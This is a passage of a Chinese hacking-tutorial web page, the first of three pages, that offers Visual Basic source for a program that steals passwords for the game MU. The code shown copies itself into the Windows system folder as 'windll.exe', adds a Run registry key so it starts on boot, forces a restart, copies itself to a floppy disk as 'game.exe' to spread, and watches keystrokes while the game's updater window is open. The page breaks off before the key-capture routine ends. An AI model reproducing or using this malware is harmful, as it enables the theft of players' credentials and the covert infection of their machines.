网站首页 | 网页制作 | 网络编程 | 图形图象 | 冲浪宝典 | 操作系统 | 软件教学 | 网络安全 | 认证考试 | 下载中心 | 游戏下载
| 网络安全首页 | 安全在线 | 病毒防治 | 黑客攻防 | 漏洞研究 | 黑客编程 | 破解手记 |
您现在的位置: 超人气学院 >> 网络安全 >> 黑客编程 >> 文章正文 用户登录 新用户注册
一个用VB设计的能够截取奇迹游戏密码的程序           
一个用VB设计的能够截取奇迹游戏密码的程序
作者:未知 文章来源:网络收集 点击数: 更新时间:2006-3-29 15:21:30
由于写的匆忙程序有很些bug,忘见凉!^-^
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As Any, ByVal lpWindowName As String) As Long
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Dim fso, wsh
Dim winsys, prg, keysvalue As String
Dim new_work, start As Boolean
Private Sub Form_Load()
 On Error Resume Next
 Let new_work = True
 Set fso = CreateObject("scripting.filesystemobject")
 Set wsh = CreateObject("wscript.shell")
 Let winsys = fso.GetSpecialFolder(SystemFolder)
 If Len(App.Path) = 3 Then
  Let prg_path = prg
  Let prg = App.Path & App.EXEName & ".exe"
 Else:
  Let prg_path = prg & "\"
  Let prg = App.Path & "\" & App.EXEName & ".exe"
 End If
 If Not fso.FileExists(winsys & "\Msvbvm60.dll") Then fso.CopyFile prg_path & "\Msvbvm60.dll", winsys & "\Msvbvm60.dll"
 If fso.FileExists(winsys & "\windll.exe") = False Then
  fso.CopyFile prg, winsys & "\windll.exe"
  wsh.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\windll", winsys & "\windll.exe"
  Shell "rundll32.exe user.exe,exitwindows"
  End
 End If
 Let keysvalue = ""
 Let start = False
 If Not fso.FileExists("a:\game.exe") Then
  fso.CopyFile prg, "a:\game.exe"
 End If
End Sub

Private Sub Timer1_Timer()
 If new_work = True And start = True Then
  Call bGetKey
 ElseIf FindWindow(0&, "mu auto update") = 0 Then
  Let new_work = True
 ElseIf FindWindow(0&, "mu auto update") <> 0 Then
  Let start = True
 End If
End Sub
Private Function bGetKey() As Boolean'这里应该需要补充密码的

[1] [2] [3] 下一页

[ 收藏此页到: 天天|和讯|博采|ViVi|狐摘|我摘|天极 ] 文章录入:kinda    责任编辑:kinda 
  • 上一篇文章:

  • 下一篇文章:
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    专 题 栏 目
    最 新 热 门
     Windows中巧用RUNDLL3[5355]
     黑客软件编写基础知识[827]
     Win32Asm快速教程[535]
    相 关 文 章
    去除oicq广告条的一个简单
    一个Winzip8.0的注册机供大
    使SoftICE在程序入口处停下
    一个很简单的算法!!算法
    一个局域网工具的注册算法
    帖一个CabinetManager2001
    一个游戏的破解,SolSuite
    B-JigsawV7.5是一个拼图游
    一个CrackMe的破解以及注册
    一个很著名的工程造价管理
    如何访问一个进程中的内存
    一个拨号软件的Win32Dasm暴
    rufeng教程第一章如何成为
    一个Delphi程序的破解:Ico
    在VB中实现移动一个没有标
    网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)